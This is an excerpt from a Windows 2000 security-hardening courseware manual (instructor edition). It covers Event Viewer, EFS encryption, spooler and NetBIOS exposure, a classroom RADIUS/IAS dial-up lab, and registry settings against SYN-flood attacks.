Event Viewer FeaturesOne of the most straightforward features in the Event Viewer is the Searchfunction. For example, you might be looking for all of the 529 events after a newpassword policy has been implemented. You need to determine the amount of badlogons in comparison to before the policy was put in place. Or, you may suspectthat a user account is being attacked and want to search only for 529 events thatare related to a certain user account.

To find any of these, you will use the View→Find command. With this command,you can search for events by using fields, including Event Source, Event ID,User, Computer, Success, Failure, Information, Warning, and Error.

In addition to the Find function, you can use the View→Filter command. TheFilter Events function enables you to select specific criteria, apply the filter, andview only the events that are relevant to your filter. For example, if you are stillunder the impression that an account is being attacked; you can select thataccount as the filter, and view all instances of that account in the Security Log.

When you apply a filter, the full log data is not altered, only the presentation ofthe data on screen. You have the same options for filtering as were available toyou when searching. In addition to the fields that are available with the Findcommand, you will also have the option to define events from and to a specificdate and time.

Finally, a very direct feature in the Event Viewer is the sorting option. Just as inother Windows applications, you can sort by any of the columns in the EventViewer to group events, such as by time or by Event ID. By default, the EventViewer displays events with the most recent event on the top of the list.

If you will need to store the logs for later reading or analysis, there is also anoption to save the log. You can save the log as either an Event Log file (*.evt), atext file (*.txt), or a CSV (Comma Separated Value or Comma Delimited) file(*.cvs). You can then open these files later in Event Viewer or in a database orother reading application.

Lesson 4: Hardening Windows Computers 295

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 349: SCNP Hardening

Third-party ApplicationsAs functional as the built in features of the Event Viewer are, for many peoplethey do not provide enough control or options. To address that need, there areseveral third-party applications that work for managing the Event Logs.

One of these programs is the Event Log Sentry, by Engagent, whose Web site iswww.engagent.com. This tool enables you to manage the logs of several comput-ers from a single location. By using this tool, you can monitor events in real-timeand have the software contact you or trigger an automated response to the events.This tool crosses the line from simply viewing the Event Logs into the realm ofIntrusion Detection Systems (IDS). IDS is beyond the scope of this course andwill be fully covered along with the Event Log Sentry tool in the NetworkDefense and Countermeasures course.

Topic 4FWindows 2000 EFSOne of the significant benefits to using personal computers is that you have theability to boot into multiple operating systems for whatever use you feel isappropriate. Although this presents great convenience and benefit to the users ofcomputers, it presents great difficulty in the world of security, especially in thecorporate environment.

In addition to the security risks of multiple operating systems, there are complexsecurity risks introduced with the use of laptop computers. Laptops often get sto-len or misplaced, and the data on the laptop computer is vulnerable tocompromise as soon as the location of the computer is unknown (unknown to theowner, that is).

By using NTFS security, you are able to combat the issues of security to a certainextent. As demonstrated, there are tools available to access even properly secureddata on an NTFS partition.

To solve this issue, we now introduce the concept of data encryption. Not a newidea, data encryption works to make the files on the computer useful only to theproper owner of the data. Some of these systems would work by providing apassword for each encrypted file, which—while effective—is not practical forlarge volumes of files.

Another method of using encryption is to use a key to unlock each file that hasbeen encrypted, with only one user holding the key. This is the approach thatMicrosoft’s Encrypting File System (EFS) takes to data encryption.

EFS uses what is known as public key cryptography, the details of which arebeyond the scope of this course. In general, however, public key cryptography isthe use of two keys: one that performs encryption and another that performsdecryption. The keys are linked by a mathematical formula. Each file that isencrypted by EFS has a unique key pair protecting its contents, using the DESencryption algorithm.

intrusion detection:Pertaining to techniqueswhich attempt to detect

intrusion into a computer ornetwork by observation ofactions, security logs, or

audit data. Detection ofbreak-ins or attempts either

manually or via softwareexpert systems that operate

on logs or other informationavailable.

EFS

296 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 350: SCNP Hardening

EFS supports file encryption both on a local hard drive and on a remote fileserver. However, it is very important to note that any files that are encrypted onthe remote server will be transmitted over the network in cleartext by default.This is because the file is decrypted at the file server and then sent to the user. Inorder to maintain a high level of security, there must be a mechanism in place tosecure the network traffic, such as IPSec, which you worked with earlier in thecourse.

The implementation of EFS works directly with NTFS. Data can be encryptedonly on NTFS partitions. EFS is designed to encrypt any temporary files createdalong with the originals, and the keys are stored in the kernel using nonpagedmemory, so they are never vulnerable to an attacker searching the pagefile of thesystem.

EFS and UsersOne of the things that can be a good—or bad—issue of EFS is that users can useit with no administrative effort. The EFS subsystem automatically creates therequired keys, if the user does not already have a public key pair to use.

Files and folders that are marked for encryption are encrypted on a per-file orper-folder basis, each with a unique encryption key. Because they are encrypteduniquely, if you move an encrypted file to an unencrypted folder on the samepartition, the file will remain encrypted. If you copy an encrypted file to a loca-tion that allows for encryption, the file will remain encrypted.

The use of EFS is designed to be transparent to the user. This means that a usermay have encryption enabled and not be aware of it. As long as things gosmoothly, this is not an issue. In the event things do not go smoothly, there aremethods for recovery.

Data RecoveryObviously, if EFS can be implemented by a user, and is designed to be transpar-ent, it can be used where it was not intended. EFS allows for what are known asRecovery Agents. The default Recovery Agent is the Administrator. These agentshave configured public keys that are used to enable file recovery. The system isdesigned so that only the file recovery is possible; the Recovery Agent cannotlearn about the user’s private key.

Using Data Recovery is designed for those companies and organizations whohave the requirement of accessing data if an employee leaves or if the encryptionkey is lost. The policy for how Data Recovery will be implemented is defined ata Domain Controller and will be enforced on every computer in that domain. IfEFS is implemented on a machine that is not part of a domain, the system willautomatically generate and save Recovery Keys.

EFS CryptographyAs mentioned, EFS uses public key cryptography, based on the DES encryptionalgorithm. This is the default; with Service Pack 1 and the High-encryption packor with Service Pack 2 or greater, 3DES is used. Data is encrypted by what iscalled a File Encryption Key (FEK). This FEK is a randomly generated key, asrequired by the algorithm.

The FEK itself is then encrypted by using a public key, which creates a list ofencrypted FEKs. The list is then stored with the encrypted file in a specialattribute called the Data Decryption Field (DDF). When a user needs to decryptthe file, he or she will use the private key that was part of the key pair.

Lesson 4: Hardening Windows Computers 297

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 351: SCNP Hardening

You can perform encryption from the command line or from within Explorer.When you are using Explorer, the option to encrypt is on the Advanced tab of thegeneral Properties window. When you are using the command line, the commandis cipher, with an /e switch for encryption and a /d switch for decryption.

TASK 4F-1Encrypting Files

Setup: You are logged on to Windows 2000 as the renamed Adminis-trator account.

1. At the root of the NTFS partition, create a text document called Mine.txt,and place some text in it.

2. Open Explorer, and display the properties of the Mine.txt file.

3. Click Advanced, check Encrypt Contents To Secure Data, and click OKtwice.

4. Observe the Explorer window to verify that the E attribute is now set.

5. Close all open windows.

Topic 4GWindows 2000 Network SecurityIn this topic, you will examine the effects of turning on/off the NetBIOS protocolon a Windows 2000 machine. NetBIOS stands for Network Basic Input OutputSystem, and is an API that allows for addressing of devices on a network, regard-less of the underlying protocol such as IP or IPX. NetBIOS itself relies on SMB.

About the TasksFor the following tasks, students should work in pairs. The tasks refer to themachines as Student_P and Student_Q. These pairs of machines will participate ina file- and printer-sharing exercise, where all the computers designated asStudent_P are Windows clients and the computers designated as Student_Q arefile and print servers.

Also, while on the subject of print shares, you will address the issue of spoolerfile insecurity that was discussed earlier. You will take a look at the contents of aspooled file. You will also capture information being sent to a network printer.You will view the contents of this capture. What you will realize pretty soon isthat information that is classified should be sent only to print servers that areclassified. The printers should also be physically secure. Folders that hold spooledfiles should be secure. It goes without saying, then, that network traffic should besecure.

Securing NetworkCommunications

298 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 352: SCNP Hardening

TASK 4G-1Investigating Printer Spooler Security

Setup: You are logged on to Windows 2000 as the renamed Adminis-trator account. If you have been designated as Student_P, youwill act as a Windows client; if you have been designated asStudent_Q, you will act as a Windows file and print server.

Note:Perform step 1 through step 18 only if you are designated as Student_Q.

1. In your boot partition, create a folder named Share.

2. Right-click this folder, and choose Sharing.

3. Click Share This Folder, leave the default share name as Share, andclick OK..

4. From the Start menu, choose Settings→Printers.

5. Double-click Add Printer.

6. Click Next.

7. Verify that Local Printer is selected. Uncheck Automatically Detect AndInstall My Plug And Play Printer. Click Next.

8. Verify that Use The Following Port is selected, leave it at the defaultport (LPT1:), and click Next.

9. Select any printer from the list, and click Next.

10. Shorten the printer name to the first four letters, and click Next.

11. Allow the printer to be shared, leave the share name to whatever is dis-played, and click Next twice.

12. When you are prompted to print a test page, click No, and then clickNext and click Finish.

13. Select the printer, and choose File→Server Properties.

14. Click the Advanced tab, and note the default location of the spool folder.It should be \WINNT\System32\Spool\PRINTERS.

15. Click OK.

16. Right-click the printer and choose Properties.

17. Click the Advanced tab, and verify that the printer is always available,and that documents will be spooled to speed up printing.

18. Check Keep Printed Documents, and click OK.

Lesson 4: Hardening Windows Computers 299

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 353: SCNP Hardening

Note: Perform step 19 through step 26 only if you are designated asStudent_P.

19. Double-click My Network Places.

20. Double-click Computers Near Me.

21. Double-click the print server.

22. Right-click the printer name (next to the shared printer icon), andchoose Connect.

23. Start Notepad.

24. Enter the text This is a classified document.

25. Save the file to your Desktop with the filename TOP_SECRET.txt.

26. Choose File→Print, select the printer you just connected to and clickPrint. Your file should be sent to the print server.

Note: Perform step 27 through step 35 only if you are designated as the printserver (Student_Q).

27. Observe the screen. Now, although there is no physical printer (or printdevice in Microsoft terminology) attached to your machine, the print serverwill try to send this job off through LPT1, and a short while later will reportan error in the form of a pop-up message.

28. When the error message is displayed, click Cancel.

29. Navigate to the \WINNT\System32\Spool\PRINTERS folder.

30. Observe the contents of the Printers folder. The files sent for printing aresitting there. They have job numbers followed by .SHD and .SPL fileextensions. The SPL files are the actual spooled files and the SHD files arethe spool header files.

The SPL file is the one that interests us.

31. Double-click the SPL file.

32. When the Open With dialog box is displayed, uncheck Always Use ThisProgram To Open These Files, and then select Notepad from the list.

33. Scroll down to the bottom of the file. Towards the end of the file, after allthe printer language is taken care of you will see the name of the file and itscontents.

34. Double-click the SHD file.

35. Uncheck Always Use This Program To Open These Files, and then selectNotepad from the list. You will see who sent this file and from whichcomputer.

How dangerous could this information be if it was really classified and

300 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 354: SCNP Hardening

someone with malicious intent configured the print server to Keep PrintedDocuments?

36. Close both instances of Notepad.

Communicating without NetBIOSSeveral networks will stipulate the disabling of NetBIOS on the network, as itprovides much information to potential attackers. In the following task, you willexamine the network performance when the server is configured not to communi-cate using NetBIOS.

TASK 4G-2Communication without NetBIOS

Note:Perform step 1 through step 4 only if you are designated as the client(Student_P).

1. From the Start menu, choose Settings→Printers.

2. Right-click the printer, choose Delete, and then click Yes.

3. If necessary, click OK to close the Printers information box.

4. From the Start menu, choose Run, and enter \\NetBIOS_Name_of_SERVER to display an Explorer window that shows you a list of shares onthe server.

Note: Perform step 5 through step 7 only if you are designated as the printserver (Student_Q).

5. Open a command prompt, and enter nbtstat -S to display NetBIOSconnections.

6. Observe the NetBIOS connections listed for the interface that the twocomputers are using for the communications.

7. Leave the command prompt open.

Note: Perform the following step only if you are designated as the client.

8. Close all open windows.

Note: Perform step 9 through step 20 only if you are designated as theserver.

9. Re-enter the command nbtstat -S to refresh the display of NetBIOSconnections.

Lesson 4: Hardening Windows Computers 301

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 355: SCNP Hardening

10. Observe that there is one less NetBIOS connection. If the connection isstill displayed, wait a few minutes and try again.

11. Now, right-click My Network Places, and choose Properties.

12. Double-click the Classroom Hub interface, and click Properties.

13. Select Internet Protocol, and then click Properties.

14. Click Advanced, and then click the WINS tab.

15. Select Disable NetBIOS Over TCP/IP.

16. Click OK, and then click Yes to acknowledge the pop-up message.

17. Click OK twice, and then click Close.

18. Repeat the last six steps to disable NetBIOS on each network interfacein your computer.

19. In the command prompt, re-enter the command nbtstat -S to refresh thedisplay.

20. Observe that there are no NetBIOS connections now.

Note: Perform step 21 through step 23 only if you are designated as theclient.

21. In the Run dialog box, re-enter \\NetBIOS_Name_of_SERVER to try andget a list of shares on the server. You should see an error message. ClickOK.

22. In the Run dialog box, enter \\IP_address_of_SERVER to try to get that listof shares. If necessary, use your partner’s remote credentials to log on.You should now see an Explorer window open showing you a list of shareson the server.

23. Close all open windows.

Note: Perform the rest of this task only if you are designated as the server.

24. Re-enter the command nbtstat -S to refresh the display.

25. Observe that, even though the client is connected, there are no NetBIOSconnections. Your connection is based on pure IP.

From this, we can gather that the NetBIOS protocol is really not necessaryfor a Windows 2000 network—although, for backward compatibility,Microsoft will not let you install a Windows 2000 machine without aNetBIOS computer name.

If (host) name resolution is required, it can be achieved via the Internet stan-dard DNS.

26. Close all open windows.

If students cannot accessthe list of shares, have

them check to make surethat the remote account has

not been locked out.

302 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 356: SCNP Hardening

NAT and ICSUp to this point, all of the security systems and methods you have been using aregeared towards securing the operating system and data on the physical hard drive.All of the security systems that you create are of little use if an attacker is able tosimply sniff all the packets off the network and recompile them at his or herleisure.

Network Address Translation (NAT) is an Internet standard that is defined in RFC1631. NAT is used to mask internal IP addresses with the IP address of the exter-nal Internet connection. Although NAT was not designed as a securitymechanism, many networks require NAT in their security policies to add an addi-tional layer between the Internet and the intranet.

NAT functions by taking a request from an internal client and making that requestto the Internet on behalf of the internal client. By using this configuration, clientson the internal network are not required to have a public IP address, thus con-serving public IP addresses. The internal clients can be configured with an IPaddress from the private network blocks. Remember, private IP addresses areones that are not routed on the Internet. They are defined by RFC 1918, and theaddress ranges are:

• 10.0.0.0 through 10.255.255.255.255

• 172.16.0.0 through 172.31.255.255

• 192.168.0.0 through 192.168.255.255

It is also worth noting that Microsoft has uses another range for private address-ing: 169.254.0.0 through 169.254.255.255. This range is not defined in the RFC,but it does allow for other private addresses to be used on a network.

NAT is an integrated part of Routing and Remote Access Services (RRAS),which will be addressed shortly, as well as part of Internet Connection Sharing(ICS). The version of NAT that is used by ICS is scaled down form the full ver-sion and does not allow for the level of configuration that the RRAS NAT allows.

ICS is designed for a small office or for a home network, where there is oneInternet connection that is to be shared by the entire network. All users connectvia a single interface, usually connected via a modem, DSL, or cable accesspoint.

Remote AccessThe Windows 2000 Routing and Remote Access Service (RRAS) is made of sev-eral components, including:

• Network Address Translation (NAT)

• Routing protocols (RIP and OSPF)

• Remote Authentication Dial-In Service (RADIUS)

The Remote Access Server of RRAS will allow for PPP connections, and can beset up to require authentication. For authentication, RRAS can be set up to usethe Remote Authentication Dial-In User Service (RADIUS) or WindowsAuthentication. If RRAS is using RADIUS, when a user request for authentica-tion is made to the RRAS server, the dial-in credentials are passed to theRADIUS server. The RADIUS server then performs the authentication and autho-rization to access for the client to access the network.

Lesson 4: Hardening Windows Computers 303

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 357: SCNP Hardening

The Remote Access Policy is controlled via the Internet Access Server (IAS),which is the Microsoft implementation of RADIUS. The Remote Access Policy isnot controlled by the RRAS server itself. The IAS performs several functions forremote users of the network, including authentication, authorization, auditing, andaccounting, to those users who connect to the network via dial-up and VPNconnections. For authentication, IAS allows for great flexibility, accepting PAP,CHAP, MS-CHAP, and EAP. EAP is Extensible Authentication Protocol and isused in conjunction with technologies such as Smart Cards, Token Cards, andone-time passwords.

RADIUS Implementation in the ClassroomThe following section contains several long tasks, involving the implementationof the RADIUS server and the RADIUS client. For these tasks, students shouldwork in pairs (Student_P and Student_Q). These pairs of machines will partici-pate in a RAS exercise where all of the computers designated as Student_P areconfigured as the Remote Access Client (or Dialup Client) and dial out to theircorresponding Dialup Server, which are the computers designated as Student_Q.These Dialup Servers will also be configured as RADIUS client. These RADIUSclients will pass on authentication requests to the Instructor Machine, which willbe configured as the RADIUS Server. Thus, the Instructor Machine will functionas the RADIUS Server for the whole class and is an integral part of the task.

For the rest of the tasks associated with implementing RADIUS, these machineswill be referred to as follows:

• Student_P: Windows 2000 Server as a Dialup Client.

• Student_Q: Windows 2000 Server as a RADIUS Client.

• Instructor_Machine: Windows 2000 Server as a RADIUS Server.

TASK 4G-3Physically Preparing for RADIUS Implementation

Objective: To take care of some physical connectivity issues prior toimplementing RADIUS in the classroom.

1. Verify that the null modem cable between the Dialup Client and theRADIUS Client is firmly in place.

2. On the Dialup Client, disable both Ethernet adapters.

3. If necessary, on the RADIUS Client, disable the Ethernet adapter con-nected to the Dialup Client, but leave the Ethernet adapter connected tothe classroom hub enabled. See the class configuration diagram that fol-lows for guidance.

4. On the RADIUS Server, do nothing. All of the RADIUS Clients will con-tact this server via the existing network.

304 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 358: SCNP Hardening

You should have a class configuration that looks like the following graphic.

Configuring the Dialup ServerIn the next task, you will configure the Dialup Server component of the RADIUSClient. You will configure this server to allocate IP addresses to Dialup Clientsfor the dialup interfaces. For the task, if the RADIUS Client is on the left side ofthe classroom and is seat number 3, then the range you should use is 192.168.163.101 to 192.168.163.110. If the RADIUS Client is on the right side of theclassroom and is seat number 8, then the range you should use is 192.168.188.101 to 192.168.188.110. Your instructor will clarify addressing requirements ifyou have any doubts at this point.

TASK 4G-4Configuring the Dialup Server Configuration

Note:Perform this task only if you are designated as a RADIUS Client.

1. From the Start menu, choose Settings→Network And Dial-upConnections.

2. Verify that the Ethernet connection connected to your neighbor’s com-puter is disabled.

Lesson 4: Hardening Windows Computers 305

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 359: SCNP Hardening

3. Open a command prompt, and use the ipconfig /all command to verifythat you have just one IP address. This should be in either the 172.16.x.xor 172.18.x.x network. Close the command prompt.

4. Double-click Make New Connection, provide the local area code (ifprompted), and then click Next.

5. Click Connect Directly To Another Computer, and click Next. SelectHost, and click Next. Select the device (Communications Port [COM1]),and click Next.

In the next box, you are supposed to select those users who can dial in;however, this RAS server will eventually be configured as a RADIUS client.So for now, we will configure a user only for the purposes of testing themodem connection.

6. Click Add. For the User Name, enter radtest.

7. For Password, enter aA123456, confirm it, and click OK.

8. Click Next.

9. Read the name for your connection, and click Finish. It might take awhile for the Wizard to close, so be patient.

10. Right-click Incoming Connections, and choose Properties.

11. Click the Networking tab, select Internet Protocol (TCP/IP), and clickProperties.

12. Under TCP/IP Address Assignment, click Specify TCP/IP Addresses.

If you are on the left side of the classroom, enter the range 192.168.16x.101 to 192.168.16x.110, where x is your seat number.

If you are on the right side of the classroom, enter the range 192.168.18x.101 to 192.168.18x.110, where x is your seat number.

13. Click OK twice.

14. Open Control Panel.

15. Double-click Phone And Modem Options.

16. Click the Modems tab.

17. If necessary, select Communications Cable Between Two Computers, andclick Properties.

18. Under Maximum Port Speed, select 115200 from the drop-down list.

19. Click OK twice, and then close all open windows.

306 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 360: SCNP Hardening

Configuring the Dialup ClientOnce the Dialup Server has been configured, a significant portion of the initialconfiguration has been completed. The next part of the process will be to config-ure the clients for dial-up usage. The setup of the two computers remains thesame for this portion of the RADIUS implementation tasks.

TASK 4G-5Configuring the Dialup Client

Note:Perform step 1 through step 20 only if you are designated as a Dialup Client.

1. From the Start menu, choose Settings→Network And Dial-upConnections.

2. Verify that your Ethernet connections are disabled.

3. Open a command prompt, and use the ipconfig /all command to verifythat you have no IP addresses. Close the command prompt.

4. Double-click Make New Connection, provide the local area code (ifprompted), and click Next.

5. Click Connect Directly To Another Computer, and click Next. SelectGuest, and click Next. Select the device (Communications Port [COM1]),and click Next twice.

6. Provide a name for your direct connection, such as DUN_01, and clickFinish. It might take a while for the wizard to close, so be patient.

7. When you are prompted to make a connection, click Cancel.

8. Open Control Panel.

9. Double-click Phone And Modem Options.

10. Click the Modems tab.

11. Select Communications Cable Between Two Computers, and clickProperties.

12. Under Maximum Port Speed, select 115200 from the drop-down list.

13. Click OK twice.

14. Right-click your direct connection, choose Properties, and then clickConfigure.

15. For Maximum Speed (bps), select 115200 from the drop-down list.

16. Click OK twice.

17. Double-click your direct connection.

Lesson 4: Hardening Windows Computers 307

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 361: SCNP Hardening

18. For the User Name and Password, enter radtest and aA123456, respec-tively, and click Connect. You should be connected to the dialup server in afew seconds.

19. Click OK to close the Connection Complete information box.

20. Verify your IP address by using the ipconfig /all command in a com-mand prompt. You should have a 192.168.16x.y or 192.168.18x.y addressassigned to the dialup interface. Close the command prompt.

Note: Perform the next step only if you are designated as a RADIUS Client.

21. Verify your IP address(es) by using the ipconfig /all command in a com-mand prompt. You should now have a 192.168.16x.y or 192.168.18x.yaddress assigned to the dialup interface. Close the command prompt.

Note: Perform the next step only if you are designated as a Dialup Client.

22. In the Network And Dial-up Connections Control Panel, right-click yourdirect connection, and choose Disconnect.

Creating Users on the RADIUS ServerNow that the Dialup Server and Dialup Client configurations have been com-pleted, it is time to move on to the RADIUS Server. Because each machine in theclassroom cannot be a server, your instructor will configure the InstructorMachine to be the RADIUS Server. Pay close attention to the steps being taken.First, a database of users will be created (this is the kind of task that an ISPwould perform to keep its user database centrally located).

INSTRUCTOR TASK 4G-6Creating Users on the RADIUS Server

Setup: Your instructor will perform this task at the InstructorMachine.

1. If necessary, log on to Windows 2000 Server as Administrator.

2. Right-click My Computer, and choose Manage.

3. In the left pane, expand Local Users And Groups and right-click theUsers folder. Choose New User.

4. For User Name, enter RaduserL1.

5. For Password, enter aA123456, and confirm it.

6. Uncheck User Must Change Password At Next Logon.

7. Check User Cannot Change Password and Password Never Expires.

8. Click Create.

308 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 362: SCNP Hardening

9. Repeat the last five steps to create users named RaduserL3, RaduserL5,RaduserL7, RaduserR1, RaduserR3, RaduserR5, and RaduserR7.

10. Click Close.

11. Click the Users folder.

12. Verify the names of the users you just created.

13. Inform each student pair (Dialup Client and RADIUS Client) whichRaduser account they will use later when testing RADIUSauthentication. For example, the second pair on the right side of the class-room should use RaduserR3.

14. Leave the Computer Management MMC open.

IASUser accounts have been created for the remote access connections. Next, IASwill be installed on the Instructor Machine to make it a RADIUS Server. Follow-ing that, RADIUS Clients that are allowed to communicate with the RADIUSServer will be specified on the RADIUS Server. A policy will also be configuredon the RADIUS Server to allow users who meet the authentication requirementsto be granted access.

INSTRUCTOR TASK 4G-7Installing IAS

Setup: Your instructor will perform this task at the InstructorMachine.

1. Right-click My Network Places, and choose Properties.

2. Choose Advanced→Optional Networking Components. Do not check oruncheck any boxes.

3. Select Networking Services, and click Details.

4. Check Internet Authentication Service, and click OK. IAS is Microsoft’simplementation of RADIUS. Click Next.

5. From the Start menu, choose Programs→Administrative Tools→InternetAuthentication Service.

6. In the left pane, right-click Clients, and choose New Client. You will beprompted to enter a friendly name.

7. For Friendly Name, enter RADCLIENT_L01 and click Next.

8. Enter the IP address of the RADIUS Client belonging to the first studentpair on the left side of the class.

9. For Shared Secret and Confirm Shared Secret, enter secret.

Lesson 4: Hardening Windows Computers 309

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 363: SCNP Hardening

10. Click Finish.

11. Repeat the last five steps to account for all RADIUS Clients in the class,on both the left and right sides.

12. In the left pane, click Remote Access Policies.

13. In the right pane, double-click the policy.

14. Under If A User Matches The Conditions, select Grant Remote AccessPermission.

15. Click OK, and close all open windows.

RIPTo allow Dialup Clients to eventually communicate, the Dialup Servers need toknow the various networks that will be coming up and create routes for them. So,you will install RIP, because that is all that is required in this classroom. A morecomplicated network will need more sophisticated dynamic routing protocols.

TASK 4G-8Installing RIP

Setup: This task requires the instructor and students to perform steps.

Note:Perform step 1 through step 6 only if you are the instructor.

1. From the Start menu, choose Programs→Administrative Tools→RoutingAnd Remote Access.

2. In the left pane, right-click your computer name, and choose ConfigureAnd Enable Routing And Remote Access.

3. Click Next, select Manually Configured Server, click Next, and thenclick Finish. When you are prompted to start the service, click Yes.

4. In the left pane, expand the computer name, and then expand IPRouting.

5. Right-click General, choose New Routing Protocol, and select RIP, orRIPv2 (whichever is listed). Click OK.

6. Right-click RIP, choose New Interface, select your network interface,and click OK twice. Close the RRAS console.

Note: Perform step 7 through step 12 only if you are designated as a RADIUSClient.

7. Form the Start menu, choose Programs→Administrative Tools→RoutingAnd Remote Access.

310 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 364: SCNP Hardening

8. In the left pane, right-click your computer name, and choose ConfigureAnd Enable Routing And Remote Access.

9. Click Next, select Manually Configured Server, click Next, and thenclick Finish. When you are prompted to start the service, click Yes.

10. In the left pane, expand the computer name, and then expand IPRouting.

11. Right-click General, choose New Routing Protocol, and select RIP. ClickOK.

12. Right-click RIP, choose New Interface, select your network interface,and click OK twice.

Configuring the Dialup Server as a RADIUS ClientIn this next task, you will configure your Dialup Server to behave as a RADIUSClient. Unlike the RADIUS Server, no extra software needs to be added to yourserver. It’s just a matter of configuring your Dialup Server for pass-throughauthentication.

TASK 4G-9Configuring the Dialup Server as a RADIUS Client

Note:Perform this task only if you are designated as a RADIUS Client.

1. In the left pane, right-click your computer name, and choose Properties.

2. Click the Security tab.

3. Under Authentication Provider, select RADIUS Authentication from thedrop-down list.

4. Click the Configure button found to the right of the drop-down list.

5. Under The Following RADIUS Servers Are Queried In Order From TheHighest To The Lowest Score, click Add.

6. Specify the IP address of the RADIUS Server. This is your instructormachine’s IP address, which should be 172.17.10.1.

7. For Secret, click the Change button, and enter the same secret yourinstructor entered on the RADIUS Server (the word secret).

8. Observe that the registered UDP port number used for RADIUS authen-tication is 1812.

9. Click OK.

Lesson 4: Hardening Windows Computers 311

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 365: SCNP Hardening

10. Observe that there is a value of 30 under Initial Score. What this meansis that you can configure your RADIUS Client to send authenticationrequests to more than one RADIUS authentication server. When you havemore than one server to choose from, the server with the higher number ischecked first. The scale runs from 0 to 30.

11. Click OK.

12. If you are prompted to restart RRAS, click OK; you will do this shortlyanyway.

13. Perform the same sequence of steps to configure your RADIUS Client tocommunicate with a RADIUS Accounting provider.

14. Click OK. Acknowledge any information boxes regarding restarting theservice.

15. In the left pane, right-click your computer name, choose All Tasks→Restart.

16. After the Restarting process box closes, close the RRAS console.

Testing the Dialup ClientNow that all the necessary components for RADIUS are in place, you will test it.From the Dialup Client, you will make a call to the Dialup Server. Because youhave configured this server for pass-through authentication, any authenticationrequest you receive on the Dialup Server will be sent to the RADIUS Server. Ifauthentication is approved, the Dialup Client will be able to connect, receive anIP address, and be part of the network.

TASK 4G-10Testing the Dialup Client

Note:Perform this task only if you are designated as a Dialup Client.

1. In the Networking And Dial-up Connections Control Panel, double-clickyour dialup connection.

2. For the User Name and Password, enter the appropriate Raduser name(such as RaduserL1, depending on which student pair you’re part of) andaA123456, and click Connect. You should be authenticated by the RADIUSServer and connected to the RADIUS Client (which is your dialup server) ina few seconds.

3. Click OK to acknowledge the Connection Complete information box.

4. Verify your IP address by using the ipconfig /all command at a com-mand prompt. When you connected to the RADIUS Client, you had a192.168.16x.y or 192.168.18x.y address. You should now see a differentaddress assigned to the dialup interface.

312 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 366: SCNP Hardening

Because you logged on as RaduserX, only the RADIUS Server could haveauthenticated you. The RADIUS Client simply passed on this authenticationrequest to the RADIUS Server and passed the approval back to the DialupClient.

5. Close the command prompt.

Bringing Back the NetworkOnce you have tested the RADIUS configuration, you need to return the class-room configuration to the state it was in before you started the RADIUS tasks.The following quick task will walk you through what is required to bring the net-work back to normal status.

TASK 4G-11Reconfiguring the Network

Note:Perform step 1 through step 2 only if you are designated as a Dialup Client.

1. If necessary, open the Networking And Dial-up Connections ControlPanel. Right-click your dialup connection, and choose Disconnect.

2. Right-click and enable your network interfaces. Close all open windows.

Note: Perform step 3 through step 4 only if you are designated as a RADIUSClient.

3. Right-click My Network Places, and choose Properties.

4. Right-click and enable the Partner interface. Close all open windows.

Lesson 4: Hardening Windows Computers 313

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 367: SCNP Hardening

Hardening TCP/IPThe TCP/IP stack in Windows is one of the most attacked components of per-sonal computers. Common attacks include Denial of Service (DoS) attacks,Distributed Denial of Service (DDoS) attacks, spoofing, smurf, and Land attacks,just to name a few. There are some configurations that can be made to the Regis-try to harden the actual TCP/IP stack in Windows 2000. These configurations arerecommended by Microsoft, are designed to specifically help defend againstDenial of Service attacks and should be another component of your layereddefense.

The following settings can be configured in the Registry. Remember to be carefulin the Registry, as errors in configuration can cause Windows to no longer func-tion properly and could require a reinstall. All of the following configurations,which are all hexadecimal values—unless noted otherwise, are found in this Reg-istry key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services.

Syn Attack DefenseConfiguring this value will modify how Windows reacts to SYN-ACKS, whichare often used in DoS attacks. The result of this configuration is to modify theresponse timeout when a DoS attack is detected. In order to determine if anattack is in progress, Windows will use the following three values:

• TCPMaxPortsExhausted

• TCPMaxHalfOpen

• TCPMaxHalfOpenRetried

There are three options for this value. The specifics are defined as follows:

• Value Name: SynAttackProtect

• Key: Tcpip\Parameters

• Value Type: REG_DWORD

• Valid Range: 0, 1, 2

• Default Value: 0

A setting of 0 is the default, which Windows defines as typical protection againstSYN attacks. A setting of 1 will cause TCP to adjust the retransmission rates ofSYN-ACKS, so that connection responses will time out quicker during SYNattacks. A setting of 2 is considered the strongest protection against SYN attacks.This setting will cause TCP connection requests to time out even quicker duringSYN attacks. From a security perspective, a setting of 2 is recommended.

Dead GatewayMultiple gateways can be configured in the settings of TCP/IP. You can, however,disable this function, since a Denial of Service (or other) attack can cause yourmachine to switch gateways. The specifics for this are defined as follows:

• Value Name: EnableDeadGWDetect

• Key: Tcpip\Parameters

• Value Type: REG_DWORD

• Valid Range: 0 (False), 1 (True)

• Default Value: 1 (True)

Hardening the TCP/IP Stack

Denial of Service:Action(s) which prevent any

